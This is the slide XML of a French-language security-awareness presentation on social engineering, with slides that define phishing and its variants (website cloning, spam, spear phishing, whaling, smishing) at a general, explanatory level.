              <a:gd name="connsiteX4" fmla="*/ 0 w 1191733"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 363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733" h="363333">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1191733" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1191733" y="363333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="363333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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fr-FR" sz="1200" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Chat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130085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mph" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="accent2"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>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 presetClass="emph" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="accent2"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>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46"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="46"/>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 presetClass="emph" presetSubtype="2" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="accent2"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on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47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>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 presetClass="emph" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="accent2"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>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8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>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 presetClass="emph" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="accent2"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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par ingénierie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="7344817" cy="5758950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>L’hameçonnage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>une technique frauduleuse destinée à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>leurrer l’internaute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> pour l’inciter à communiquer des données personnelles (comptes d’accès, mots de passe…) et/ou bancaires en se faisant passer pour un tiers de confiance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>La plupart des attaques de phishing se font par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> en envoyant des milliers de</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Les communications prétendant provenir de sites Web sociaux populaires, de sites d'enchères, de processus de paiement en ligne ou d'administrateurs informatiques sont couramment utilisées pour attirer le public sans méfiance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Techniques de phishing : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>La plupart des attaques de phishing se font </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>en masse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>en envoyant des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>spams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Clonage de site web </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Manipulation d’URL.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="fr-FR" sz="1600"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65</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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5538" y="0"/>
            <a:ext cx="2136462" cy="1345721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Groupe 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8420832" y="3052645"/>
            <a:ext cx="3269412" cy="3303705"/>
            <a:chOff x="7820759" y="3337105"/>
            <a:chExt cx="2812561" cy="2842062"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Image 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="9241" t="601" r="13760" b="28735"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7820759" y="3337105"/>
              <a:ext cx="2812561" cy="2756412"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Image 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect t="95648" r="63741"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8056147" y="5973362"/>
              <a:ext cx="1605438" cy="205805"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279872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par ingénierie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805753"/>
            <a:ext cx="9805416" cy="857914"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Par clonage de site web</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66</a:t>
            </a:fld>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66" y="1745769"/>
            <a:ext cx="5381306" cy="4377927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>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113" y="1745769"/>
            <a:ext cx="5362619" cy="4421282"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="16405" r="48169" b="90944"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079736" y="1745768"/>
            <a:ext cx="3524229" cy="732886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="17853" t="-12" r="34049" b="91034"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6455486" y="1771467"/>
            <a:ext cx="4429666" cy="681487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8186464" y="2112210"/>
            <a:ext cx="345057" cy="2586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55538" y="0"/>
            <a:ext cx="2136462" cy="1345721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254617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par ingénierie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805753"/>
            <a:ext cx="9805416" cy="857914"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Par utilisation de SPAM</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67</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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548" y="1753424"/>
            <a:ext cx="7719894" cy="4513168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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5538" y="0"/>
            <a:ext cx="2136462" cy="1345721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23115989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par ingénierie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298186" y="805752"/>
            <a:ext cx="6395912" cy="5550598"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> phishing (lance)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>spear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> phishing" est un type de campagne de phishing qui cible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>une personne ou un groupe spécifique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>et comprend souvent des informations connues pour intéresser la cible, telles que des événements actuels ou des documents financiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whaling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (pêche à la baleine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>whaling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> est une forme de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>spear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> phishing qui cible des individus spécifiques de grande valeur (par titre, par secteur, à partir de la couverture médiatique, etc.), tels que le PDG, administrateurs ou clients fortunés.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Les attaques de chasse à la baleine nécessitent beaucoup plus de recherche, de planification et de développement de la part des attaquants afin de tromper la victime. En effet, ces personnels de haut niveau sont souvent bien conscients qu'ils sont une cible de grande valeur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2400"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68</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="3045745"/>
            <a:ext cx="9805416" cy="2342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4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724" y="1204098"/>
            <a:ext cx="5374256" cy="4247796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9544182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par ingénierie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805753"/>
            <a:ext cx="9805416" cy="5655432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Smishing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Smishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>(phishing basé sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>les SMS) est un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>hameçonage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> effectué sur n’importe quel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>service de messages courts (SMS) est une attaque d'ingénierie sociale qui se produit sur ou via des services de messagerie texte standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
